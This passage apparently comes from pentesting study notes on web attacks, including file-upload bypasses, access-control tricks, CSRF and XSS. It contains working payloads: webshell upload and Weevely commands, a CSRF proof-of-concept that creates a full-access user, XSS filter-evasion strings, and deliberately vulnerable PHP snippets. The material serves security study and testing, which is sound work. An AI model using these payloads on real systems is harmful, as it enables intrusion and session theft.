                  • PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection.
                  • OWASP: https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
                  • Portswigger: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
                  • Unleashing an Ultimate XSS Polyglot: https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
• Directory traversal attack
• LFI attack - Local File Inclusion attack
• Remote Code Execution
• RFD attack - Reflected File Download attack (Reflected File Download Checker - Burp Extension)
• RFI attack - Remote File Inclusion attack
• Session Puzzling (XSS-Me)
• SSRF attack - Server Side Request Forgery (Burp Collaborator, Burp Intruder, manually; built-in lists in Burp)
• WSTG-INPV-05 SQL injection (cheat sheet for manual attack, sqlmap; payloads from my dictionary repo)
• XFS attack - Cross-frame Scripting attack
• WSTG-INPV-01 WSTG-INPV-02 WSTG-CLNT-01 XSS attack - Cross-Site Scripting attack (beef, XSSer, Easy-XSS, manual testing, XSSMe tool on github)
                    • https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
                    • https://github.com/payloadbox/xss-payload-list
                    • https://gist.github.com/michenriksen/d729cd67736d750b3551876bbedbe626

                    Public exploits

We can use these resources:

• searchsploit
• ExploitDB
• Rapid7.com
• Vulnerability Lab
• metasploit: check verification scripts to test for the existence of a vulnerability.
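For example, a quick local lookup with searchsploit (the search term is illustrative and <EDB-ID> is a placeholder):

# Search the local ExploitDB copy by keyword\nsearchsploit proftpd 1.3.5\n# Examine an entry, or mirror it into the current directory\nsearchsploit -x <EDB-ID>\nsearchsploit -m <EDB-ID>\n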

                    ","tags":["pentesting","web","pentesting","exploitation"]},{"location":"webexploitation/arbitrary-file-upload/","title":"Arbitrary File Upload","text":"OWASP

                    OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.8. Test Upload of Unexpected File Types

• 10.8 WSTG-BUSL-08 - Test Upload of Unexpected File Types: Review the project documentation for file types that are rejected by the system. Verify that the unwelcome file types are rejected and handled safely; also check whether the website only validates the \"Content-Type\" header or the file extension. Verify that file batch uploads are secure and do not allow any bypass of the set security measures.
• 10.9 WSTG-BUSL-09 - Test Upload of Malicious Files: Identify the file upload functionality. Review the project documentation to identify which file types are considered acceptable, and which would be considered dangerous or malicious. If documentation is not available, consider what would be appropriate based on the purpose of the application. Determine how the uploaded files are processed. Obtain or create a set of malicious files for testing. Try to upload the malicious files to the application and determine whether they are accepted and processed.

                    An arbitrary file upload vulnerability is a type of security flaw in web applications that allows an attacker to upload and execute malicious files on a web server. This can have serious consequences, including unauthorized access to sensitive data, server compromise, and even complete system control. The vulnerability arises when the application fails to properly validate and secure the uploaded files. This means that the application may not check if the uploaded file is actually of the expected type (e.g., image, PDF), or it may not restrict the file's location or execution on the server.

                    Exploitation: An attacker identifies the file upload functionality in the target application and attempts to upload a malicious file. This file can be crafted to include malicious code, such as PHP scripts, shell commands, or malware.

                    Bypassing Validation: If the application doesn't properly validate file types or restricts file locations, the attacker can upload a file with a misleading extension (e.g., uploading a PHP file with a .jpg extension).

                    ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/arbitrary-file-upload/#bypass-file-upload-restrictions","title":"Bypass file upload restrictions","text":"

Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code onto the system to be attacked; then the attacker only needs to find a way to get that code executed. Using a file upload helps the attacker accomplish the first step.

                    ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/arbitrary-file-upload/#cheat-sheet-for-php","title":"Cheat sheet for php","text":"

                    Source: Repo from imran-parray OWASP deep explanation: link

# Try to upload a simple php file\nupload.php\n\n# To bypass the blacklist\nupload.php.jpeg\n\n# To bypass the blacklist\nupload.jpg.php\n\n# Upload upload.php but change the content type of the file to image or jpeg\nupload.php\n\n# Append a version number (1 2 3 4 5 6 7) to bypass extension filters\nupload.php*\n\n# Case variations to bypass the blacklist\nupload.PHP\nupload.PhP\nupload.pHp\n\n# Upload a .htaccess so that [jpg,png] files can be executed as php with malicious code within them\nupload .htaccess\n\n# To test against DoS\npixelFlood.jpg\n\n# Upload a gif file with 10^10 frames\nframeflood.gif\n\n# Malicious zTXt chunk: add a backdoor in the image comments using ExifTool\nupload UBER.jpg\n\n# getimagesize() bypass: rename the jpg file to .php so it will be executed; here the server verification is limited to the contents of the uploaded file, not its extension\nupload.php\n\n# Backdoor in php chunks\nphppng.png\n\n# Backdoor in php chunks\nxsspng.png\n
                    ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/arbitrary-file-upload/#execute-a-file-uploaded-as-an-image-in-nginx","title":"Execute a file uploaded as an image in nginx","text":"

After bypassing a file upload filter (using a .jpg extension but a php mimetype), the file is treated by the application as an image.

How can we bypass that situation? This works on some versions of the nginx server:

                    # After the name of the file with the jpg extension, add slash and the name of the file with the uploaded and accepted mimetype php. After that you can use the CMD command of the webshell.\n\nhttps://example.com/uploads/lolo.jpg/lolo.php?cmd=pwd\n

                    ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/arbitrary-file-upload/#tools","title":"Tools","text":"

Generate a PHP webshell with Weevely and save it as an image:

                    weevely generate secretpassword example.png \n

                    Upload it to the application.

                    Make the connection with weevely:

                    weevely https://example.com/uploads/example.jpg/example.php secretpassword\n

                    ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/arbitrary-file-upload/#bypass-php-version-based-file-extension-filters-when-running-the-file","title":"Bypass PHP version-based file extension filters when running the file","text":"

Sometimes a web server may prevent some PHP files from running based on their PHP version. A way of bypassing this is to indicate in the file extension the PHP version you want the file to be run with.

                    shell.php7\n

In this case, the uploaded file could be executed as PHP 7.

                    ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/broken-access-control/","title":"Broken access control","text":"OWASP

                    OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.2. Testing for Bypassing Authorization Schema

• 5.2 WSTG-ATHZ-02 - Testing for Bypassing Authorization Schema: Assess if horizontal or vertical access is possible. Try to access administrative functions by forced browsing (/admin/addUser).

Access control determines whether the user is allowed to carry out the action that they are attempting to perform. In the context of web applications, access control is dependent on authentication and session management.

• Authentication confirms that the user is who they say they are.
• Session management identifies which subsequent HTTP requests are being made by that same user.

                    Types of broken access control:

                    • Vertical access control: a regular user can access or perform operations on endpoints reserved to admins.
                    • Horizontal access control: a regular user can access resources or perform operations on other users.
                    • Context-dependent access control: Context-dependent access controls restrict access to functionality and resources based upon the state of the application or the user's interaction with it. For example, a retail website might prevent users from modifying the contents of their shopping cart after they have made payment.
                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#exploitation","title":"Exploitation","text":"

                    This is how you usually test these vulnerabilities:

                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#unprotected-functionality","title":"Unprotected functionality","text":"

At its most basic, vertical privilege escalation arises where an application does not enforce any protection for sensitive functionality. Example: accessing the /admin panel (or a less obvious URL for the admin functionality).

                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#parameter-based-access-control-methods","title":"Parameter-based access control methods","text":"

                    When the application makes access control decisions based on a submitted value.

                    https://insecure-website.com/login/home.jsp?admin=true\n

                    This approach is insecure because a user can modify the value and access functionality they're not authorized to, such as administrative functions. In the following example, I'm the user wiener, but I can access to user carlos information by modifying the parameter id in the request:

                    GET /my-account?id=carlos HTTP/2\n

For GUIDs and obfuscated parameters, you can chain a data exposure vulnerability with this, or an IDOR.

                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#url-override-methods","title":"URL override methods","text":"

There are various non-standard HTTP headers that can be used to override the URL in the original request, such as X-Original-URL and X-Rewrite-URL.

                    If a website uses rigorous front-end controls to restrict access based on the URL, but the application allows the URL to be overridden via a request header, then:

                    POST / HTTP/1.1\nHost: target.com\nX-Original-URL: /admin/deleteUser \n...\n
                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#url-matching-discrepancies","title":"URL-matching discrepancies","text":"

                    Websites can vary in how strictly they match the path of an incoming request to a defined endpoint.

• For example, they may tolerate inconsistent capitalization, so a request to /ADMIN/DELETEUSER may still be mapped to the /admin/deleteUser endpoint. If the access control mechanism is less tolerant, it may treat these as two different endpoints and fail to enforce the correct restrictions as a result.
• The Spring framework with the useSuffixPatternMatch option enabled allows paths with an arbitrary file extension to be mapped to an equivalent endpoint with no file extension.
• On other systems, you may encounter discrepancies in whether /admin/deleteUser and /admin/deleteUser/ (with a trailing slash) are treated as the same endpoint.
                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#idors","title":"IDORS","text":"

                    IDORs occur if an application uses user-supplied input to access objects directly and an attacker can modify the input to obtain unauthorized access.

                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#abusing-referer-request-header","title":"Abusing Referer Request header","text":"

The Referer header can be added to requests by browsers to indicate which page initiated a request.

For example, an application robustly enforces access control over the main administrative page at /admin, but for sub-pages such as /admin/deleteUser it only inspects the Referer header. If the Referer header contains the main /admin URL, then the request is allowed.
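A sketch of such a forged request (the host and endpoint are illustrative):

GET /admin/deleteUser HTTP/1.1\nHost: target.com\nReferer: https://target.com/admin\n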

                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#other-headers-to-consider-for-location-base-control","title":"Other Headers to Consider for location-base control","text":"

Often admin panels or administrative bits of functionality are only accessible to clients on local networks, so it may be possible to abuse various proxy- or forwarding-related HTTP headers to gain access. Some headers and values to test with are listed below (see the example request after the list):

                    • Headers:
                      • X-Forwarded-For
                      • X-Forward-For
                      • X-Remote-IP
                      • X-Originating-IP
                      • X-Remote-Addr
                      • X-Client-IP
                    • Values
• 127.0.0.1 (or anything in the 127.0.0.0/8 or ::1/128 address spaces)
                      • localhost
• Any RFC1918 address:
  • 10.0.0.0/8
  • 172.16.0.0/12
  • 192.168.0.0/16
• Link local addresses: 169.254.0.0/16
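For example, a sketch probing a restricted endpoint while spoofing an internal source address (the header choice and target are illustrative):

GET /admin HTTP/1.1\nHost: target.com\nX-Forwarded-For: 127.0.0.1\n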
                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/buffer-overflow/","title":"Buffer Overflow attack","text":"

A buffer is an area in RAM (Random Access Memory) reserved for temporary data storage. If a developer does not enforce a buffer's limits, an attacker could find a way to write data beyond those limits.

A stack is a LIFO (last in, first out) data structure used to store data. It has two methods: push (adds an element to the top of the stack) and pop (removes the top element from the stack).

                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/captcha-replay-attack/","title":"Captcha Replay attack","text":"

A captcha replay attack is a vulnerability in which the captcha validation system accepts old captcha values that have already expired. This is sometimes considered legitimate behavior (as would be expected if the user refreshed the browser after submitting a successful captcha); however, in many cases such functionality makes the captcha significantly less effective at preventing automation.

In this case, the attacker resubmitted a request that had already been successfully validated through a captcha, and \"replay\" was explicitly disabled for the captcha. This is not necessarily a malicious incident on its own, because the user could have accidentally refreshed the browser; however, multiple attempts would definitely represent malicious intent.

                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/carriage-return-and-linefeed-crlf/","title":"Carriage Return and Linefeed - CRLF Attack","text":"

                    Source: Owasp description: https://owasp.org/www-community/vulnerabilities/CRLF_Injection.

                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/carriage-return-and-linefeed-crlf/#description","title":"Description","text":"

A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL. CRLF is the acronym used to refer to Carriage Return (\r) Line Feed (\n). As one might notice from the symbols in the brackets, \"Carriage Return\" refers to the end of a line, and \"Line Feed\" refers to the new line.

The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line; however, they are dealt with differently in today's popular operating systems. For example, in Windows both a CR and an LF are required to note the end of a line, whereas in Linux/UNIX only an LF is required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.

                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/carriage-return-and-linefeed-crlf/#tools-and-payloads","title":"Tools and payloads","text":"
                    • See updated chart: Attacks and tools for web pentesting.
                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/cross-frame-scripting-xfs/","title":"XFS attack - Cross-frame Scripting","text":"","tags":["web pentesting","attack"]},{"location":"webexploitation/cross-frame-scripting-xfs/#tools-and-payloads","title":"Tools and payloads","text":"
                    • See updated chart: Attacks and tools for web pentesting.
                    ","tags":["web pentesting","attack"]},{"location":"webexploitation/cross-site-request-forgery-csrf/","title":"CSRF attack - Cross Site Request Forgery","text":"OWASP

                    OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.5. Testing for Cross Site Request Forgery

• 6.5 WSTG-SESS-05 - Testing for Cross Site Request Forgery: Determine whether it is possible to initiate requests on a user's behalf that are not initiated by the user. Conduct URL analysis and check for direct access to functions without any token.

                    Cross Site Request Forgery (CSRF) is a type of web security vulnerability that occurs when an attacker tricks a user into performing actions on a web application without their knowledge or consent. A successful CSRF exploit can compromise end user data and operation when it targets a normal user. If the targeted end user is the administrator account, a CSRF attack can compromise the entire web application.

                    CSRF vulnerabilities may arise when applications rely solely on HTTP cookies to identify the user that has issued a particular request. Because browsers automatically add cookies to requests regardless of the request's origin, it may be possible for an attacker to create a malicious web site that forges a cross-domain request to the vulnerable application.

                    Three conditions that enable CSRF:

                    • A relevant action.
                    • Cookie-based session handling.
                    • No unpredictable request parameters.
                    ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#how-it-works","title":"How it works","text":"
1. The attacker crafts a malicious request (e.g., changing the user's email address or password) and embeds it in a web page, email, or some other form of content.\n\n2. The attacker lures the victim into loading this content while the victim is authenticated in the target web application.\n\n3. The victim's browser automatically sends the malicious request, including the victim's authentication cookie.\n\n4. The web application, trusting the request due to the authentication cookie, processes it, causing the victim's account to be compromised or modified.\n

                    CSRF attacks can have serious consequences:

                    • Unauthorized changes to a user's account settings.
                    • Fund transfers or actions on behalf of the user without their consent.
                    • Malicious actions like changing passwords, email addresses, or profile information.
                    ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#how-to-test-csrf-by-using-burpsuite-proof-of-concept","title":"How to test CSRF by using Burpsuite proof of concept","text":"

Burp has a quite awesome PoC generator, so you can create HTML (and JavaScript) code to replicate this attack.

                    1. Select a URL or HTTP request anywhere within Burp, and choose Generate CSRF PoC within Engagement tools in the context menu.

2. You have two buttons: one to regenerate the HTML manually based on an updated request (Regenerate button), and the other to test the effectiveness of the generated PoC in Burp's browser (Test in browser button).

                    3. Open the crafted page from the same browser where the user has been logged in.

                    4. Observe the result, i.e. check if the web server executed the request.

                    ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#fetch-api","title":"Fetch API","text":"

                    Requirements:

                    1. Authentication Method should be cookie based only
                    2. No Authentication Token in Header
                    3. Same-Origin Policy should not be enforced

                    Browser -> Network tab in development tools, right click on request and copy as fetch:
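As an illustrative sketch (endpoint, parameter, and body are hypothetical), the copied fetch request can then be replayed from an attacker-controlled page; credentials: 'include' makes the browser attach the victim's cookies, and the urlencoded content type keeps it a \"simple\" request that skips the CORS preflight:

<script>\n// Hypothetical state-changing request replayed with the victim's cookies\nfetch('https://vulnerable.site/api/email/change', {\n    method: 'POST',\n    credentials: 'include', // attach session cookies cross-site\n    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },\n    body: 'email=attacker@evil.site'\n});\n</script>\n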

                    ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#json-csrf","title":"Json CSRF","text":"

                    Resources: https://systemweakness.com/ways-to-exploit-json-csrf-simple-explanation-5e77c403ede6

                    POC: source rootsploit.com

                    # Change the URL and Body from the PoC file to perform the CSRF on JSON Endpoint.\n<html>\n<title>CSRF Exploit POC by RootSploit</title>\n\n<body>\n    <center>\n        <h1> CSRF Exploit POC by RootSploit</h1>\n\n        <script>\n            function JSON_CSRF() {\n                fetch('https://vuln.rootsploit.io/v1/addusers', { method: 'POST', credentials: 'include', headers: { 'Content-Type': 'application/json' }, body: '{\"user\":{\"role_id\":\"full_access\",\"first_name\":\"RootSploit\",\"last_name\":\"RootSploit\",\"email\":\"csrf-test@rootsploit.com\",\"password\":\"Password@\",\"confirm_password\":\"Password@\",\"mobile_number\":\"99999999999\"}}' });\n                window.location.href=\"https://rootsploit.com/csrf\"\n            }\n        </script>\n\n        <button onclick=\"JSON_CSRF()\">Exploit CSRF</button>\n    </center>\n</body>\n\n</html>\n
                    ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#mitigation","title":"Mitigation","text":"

                    Cross-Site Request Forgery Prevention Cheat Sheet
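As a minimal server-side sketch of the synchronizer token pattern described there (PHP, with a hypothetical csrf_token form field):

<?php\nsession_start();\n\n// Generate an unpredictable token once per session\nif (empty($_SESSION['csrf_token'])) {\n    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));\n}\n\n// Verify it on every state-changing request\nif ($_SERVER['REQUEST_METHOD'] === 'POST') {\n    if (!hash_equals($_SESSION['csrf_token'], $_POST['csrf_token'] ?? '')) {\n        http_response_code(403);\n        exit('Invalid CSRF token');\n    }\n}\n?>\n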

                    ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#related-labs","title":"Related labs","text":"
                    • https://portswigger.net/web-security/all-labs#cross-site-request-forgery-csrf
                    ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#resources","title":"Resources","text":"

                    When it comes to web vulnerabilities, it is useful to have some links at hand:

• OWASP vuln description: https://owasp.org/www-community/attacks/csrf.
                    • Using Burp to Test for Cross-Site Request Forgery (CSRF): https://portswigger.net/support/using-burp-to-test-for-cross-site-request-forgery.
                    • PoC with Burp, official link: https://portswigger.net/burp/documentation/desktop/functions/generate-csrf-poc.
                    ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#tools-and-payloads","title":"Tools and payloads","text":"
                    • See updated chart: Attacks and tools for web pentesting.
                    ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-scripting-xss/","title":"XSS attack - Cross-Site Scripting","text":"OWASP reference

                    OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.2. Testing for Stored Cross Site Scripting

                    ID Link to Hackinglife Link to OWASP Description 7.1 WSTG-INPV-01 Testing for Reflected Cross Site Scripting - Identify variables that are reflected in responses. - Assess the input they accept and the encoding that gets applied on return (if any). 7.2 WSTG-INPV-02 Testing for Stored Cross Site Scripting - Identify stored input that is reflected on the client-side. - Assess the input they accept and the encoding that gets applied on return (if any). 11.1 WSTG-CLNT-01 Testing for DOM-Based Cross Site Scripting - Identify DOM sinks. - Build payloads that pertain to every sink type. Sources for these notes
• My INE notes: eWPTv2.
• Hacktricks.
• XSS Filter Evasion Cheat Sheet.
• OWASP: WSTG.
• Notes during the Cybersecurity Bootcamp at The Bridge.
                    • Experience pentesting applications.

Cross-Site scripting (XSS) is a client-side web vulnerability that allows attackers to inject malicious scripts into web pages. It is typically caused by a lack of input sanitization/validation in web applications. Attackers leverage XSS vulnerabilities to inject malicious code into web applications; because XSS is a client-side vulnerability, these scripts are executed by the victim's browser. XSS vulnerabilities affect web applications that lack input validation and leverage client-side scripting languages such as JavaScript, Flash, CSS, etc.

                    # Quick steps to test XSS \n# 1. Find a reflection point (inspect source code and expand all tags to make sure that it's really a reflection point and it's not parsing your input)\n# 2. Test with <i> tag\n# 3. Test with HTML/JavaScript code (alert('XSS'))\n

                    But, of course, you may use an extensive repository of payloads. This OWASP cheat sheet is kind of a bible.

                    XSS attacks are typically exploited for the following objectives:

                    1. Cookie stealing/Session hijacking - Stealing cookies from users with authenticated sessions, allowing you to login as other users by leveraging the authentication information contained within a cookie.
                    2. Browser exploitation - Exploitation of browser vulnerabilities.
                    3. Keylogging - Logging keyboard entries made by other users on a web application.
                    4. Phishing - Injecting fake login forms into a webpage to capture credentials.
                    5. ... and many more.
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#types-of-cross-site-scripting-xss","title":"Types of Cross-Site Scripting XSS","text":"

1. Reflected attacks: the malicious payload is carried inside the request that the victim's browser sends. You need to bypass the anti-XSS filters. When the victim clicks the crafted link, their information is sent to the attacker (limited to JS events).

                    Example:

http://victim.site/search.php?find=<payload>\n

2. Persistent or stored XSS attacks: the payload is sent to the web server and then stored. The most common vector for these attacks are HTML forms that submit content to the web server and then display that content back to the users (comments, user profiles, forum posts\u2026). Basically, if the payload somehow stays on the server, everyone who accesses the affected page will suffer the attack.

3. DOM based XSS attacks: a tricky one. This time the JavaScript file comes from the server, and in that sense the file is trusted. Nevertheless, the file makes changes to the web structure. Quoting OWASP: \"DOM Based XSS (or as it is called in some texts, \u201ctype-0 XSS\u201d) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM \u201cenvironment\u201d in the victim\u2019s browser used by the original client side script, so that the client side code runs in an unexpected manner\".

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#1-reflected-cross-site-scripting","title":"1. Reflected Cross Site Scripting","text":"

                    OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.1. Testing for Reflected Cross Site Scripting

                    ID Link to Hackinglife Link to OWASP Description 7.1 WSTG-INPV-01 Testing for Reflected Cross Site Scripting - Identify variables that are reflected in responses. - Assess the input they accept and the encoding that gets applied on return (if any).

Reflected Cross-site Scripting (XSS) occurs when an attacker injects browser-executable code within a single HTTP response. The injected attack is not stored within the application itself; it is non-persistent and only impacts users who open a maliciously crafted link or third-party web page. When a web application is vulnerable to this type of attack, it passes unvalidated input sent through requests back to the client.

                    XSS Filter Evasion Cheat Sheet

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#causes","title":"Causes","text":"

                    This vulnerable PHP code in a welcome page may lead to an XSS attack:

                    <?php $name = @$_GET['name']; ?>\n\nWelcome <?=$name?>\n
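A hypothetical attack URL against that page (the file name is an assumption), shown plain and URL-encoded:

http://victim.site/welcome.php?name=<script>alert(document.cookie)</script>\n\n# URL-encoded\nhttp://victim.site/welcome.php?name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E\n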
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#2-persistent-or-stored-cross-site-scripting","title":"2. Persistent or stored Cross Site Scripting","text":"OWASP reference

                    OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.2. Testing for Stored Cross Site Scripting

                    ID Link to Hackinglife Link to OWASP Description 7.2 WSTG-INPV-02 Testing for Stored Cross Site Scripting - Identify stored input that is reflected on the client-side. - Assess the input they accept and the encoding that gets applied on return (if any).

Stored cross-site scripting is a vulnerability where an attacker is able to inject JavaScript code into a web application\u2019s database or source code via an input that is not sanitized. For example, if an attacker is able to inject a malicious XSS payload into a webpage on a website without proper sanitization, the payload injected into the webpage will be executed by the browser of anyone that visits that webpage.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#causes_1","title":"Causes","text":"

                    This vulnerable PHP code in a welcome page may lead to a stored XSS attack:

<?php \n$file  = 'newcomers.log';\nif(@$_GET['name']){\n    $current = file_get_contents($file);\n    $current .= $_GET['name'].\"\\n\";\n    //store the newcomer\n    file_put_contents($file, $current);\n}\n//If admin, show the stored newcomers without any sanitization\nif(@$_GET['admin']==1)\n    echo file_get_contents($file);\n?>\n\nWelcome <?=@$_GET['name']?>\n
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#3-dom-cross-site-scripting-type-0-or-local-xss","title":"3. DOM Cross Site Scripting (Type-0 or Local XSS)","text":"OWASP reference

OWASP Web Security Testing Guide 4.2 > 11. Client-side Testing > 11.1. Testing for DOM-Based Cross Site Scripting

                    ID Link to Hackinglife Link to OWASP Description 11.1 WSTG-CLNT-01 Testing for DOM-Based Cross Site Scripting - Identify DOM sinks. - Build payloads that pertain to every sink type.

                    The key in exploiting this XSS flaw is that the client-side script code can access the browser's DOM, thus all the information available in it. Examples of this information are the URL, history, cookies, local storage,... Technically there are two keywords: sources and sinks. Let's use the following vulnerable code:

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#causes_2","title":"Causes","text":"

                    This vulnerable code in a welcome page may lead to a DOM XSS attack: http://example.com/#w!Giuseppe

<h1 id='welcome'></h1>\n<script>\n    var w = \"Welcome \";\n    var name = document.location.hash.substring(\n                document.location.hash.search(/#w!/i) + 3,\n                document.location.hash.length\n                );\n    document.getElementById('welcome').innerHTML = w + name;\n</script>\n

                    location.hash is the source of the untrusted input. .innerHTML is the sink where the input is used.
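Assuming the code above, an attacker could deliver the payload directly in the URL fragment; since innerHTML does not execute script tags, an img/onerror payload is the usual choice:

http://example.com/#w!<img src=x onerror=alert(document.cookie)>\n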

                    To deliver a DOM-based XSS attack, you need to place data into a source so that it is propagated to a sink and causes execution of arbitrary JavaScript. The most common source for DOM XSS is the URL, which is typically accessed with the\u00a0window.location\u00a0object.

                    What is a sink? A sink is a potentially dangerous JavaScript function or DOM object that can cause undesirable effects if attacker-controlled data is passed to it. For example, the\u00a0eval()\u00a0function is a sink because it processes the argument that is passed to it as JavaScript. An example of an HTML sink is\u00a0document.body.innerHTML\u00a0because it potentially allows an attacker to inject malicious HTML and execute arbitrary JavaScript.

                    Summing up: you should avoid allowing data from any untrusted source to be dynamically written to the HTML document.

                    Which sinks can lead to DOM-XSS vulnerabilities:

                    • document.write()
                    • document.writeln()
• location.replace()
                    • document.domain
                    • element.innerHTML
                    • element.outerHTML
                    • element.insertAdjacentHTML
                    • element.onevent

This project, the DOMXSS Wiki, aims to identify source and sink methods exposed by public, widely used JavaScript frameworks.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#4-universal-xss-uxss","title":"4. Universal XSS (UXSS)","text":"

Universal XSS is a particular type of Cross Site Scripting that does not leverage flaws in a web application, but in the browser, its extensions, or its plugins. A typical example could be found in the Google Chrome WordReference Extension, which did not properly sanitize the search input.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#attack-techniques","title":"Attack techniques","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#quick-steps-to-test-xss","title":"Quick steps to test XSS","text":"

1. Detect input vectors. Find a reflection point for a given input entry. This is tricky, since sometimes the entered value is reflected in a different part of the application.

2. Check impact. Once the reflection point is identified, inspect the source code and recursively expand all tags to make sure that it's really a reflection point and it's not parsing your input. This is also tricky, but there are techniques such as encoding and double encoding that will allow us to bypass some XSS filters.

3. Classify correctly what your injection point is like. Are you injecting raw HTML directly or an HTML tag? Are you injecting a tag attribute value? Are you injecting into the JavaScript code? Where in the DOM are you operating? Is there a WAF tampering with your input? Answering these questions amounts to knowing which characters you need to escape.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#1-bypassing-xss-filters","title":"1. Bypassing XSS filters","text":"

Reflected cross-site scripting attacks can be prevented when the web application sanitizes input, when a web application firewall blocks malicious input, or by mechanisms embedded in modern web browsers.

                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#11-injecting-inside-raw-html","title":"1.1. Injecting inside raw HTML","text":"
                    <script>alert(1)</script>\n<img src=x onerror=alert(1) />\n<svg onload=alert('XSS')>\n
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#12-injecting-into-html-tags","title":"1.2. Injecting into HTML tags","text":"

                    Firstly, some common escaping characters that may be parsed (and you need to further investigate to see how the application is treating them) are:

                    • >\u00a0(greater than)
                    • <\u00a0(less than)
                    • &\u00a0(ampersand)
                    • '\u00a0(apostrophe or single quote)
                    • \"\u00a0(double quote)

Additionally, there might be a filter for the string 'script'. If that is the case:

                    1. Insert unexpected variations in the syntax such as random capitalization, blank spaces, new lines...:

                    \"><script >alert(document.cookie)</script >\n\"><ScRiPt>alert(document.cookie)</ScRiPt>\n

                    2. Bypass non-recursive filtering:

<scr<script>ipt>alert(document.cookie)</script>\n

                    3. Bypass encoding.

# Simple encoding\n\"%3cscript%3ealert(document.cookie)%3c/script%3e\n\n# More encoding techniques: \n# 1. Look for a charcode calculator and enter your payload; for instance, \"lala\" would be: 34, 108, 97, 108, 97, 34\n# 2. Then put those numbers in your payload\n<script>alert(String.fromCharCode(34, 108, 97, 108, 97, 34))</script>\n

                    Double encoding is very effective. I've run into cases in the wild.

                    4. Unexpected parent tags:

                    <svg><x><script>alert('1'&#41</x>\n

                    5. Unexpected weird attributes, null bytes:

                    <script x>\n<script a=\"1234\">\n<script ~~~>\n<script/random>alert(1)</script>\n<script ///Note the newline\n>alert(1)</script>\n<scr\\x00ipt>alert(1)</scr\\x00ipt>\n

More options. If the script tag is heavily blacklisted in all its forms, use other tags:

                    <img> ... <IMG>\n<iframe>\n<input>\n

                    Or even, make out your own:

                    <lalala> \n
                    ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#13-injecting-into-html-attributes","title":"1.3. Injecting into HTML attributes","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#a-id","title":"a) id","text":"

                    For instance, this injection endpoint (INJ):

                    <div id=\"INJ\">\n

A payload for grabbing the cookies and having them sent to our attacker server would be:

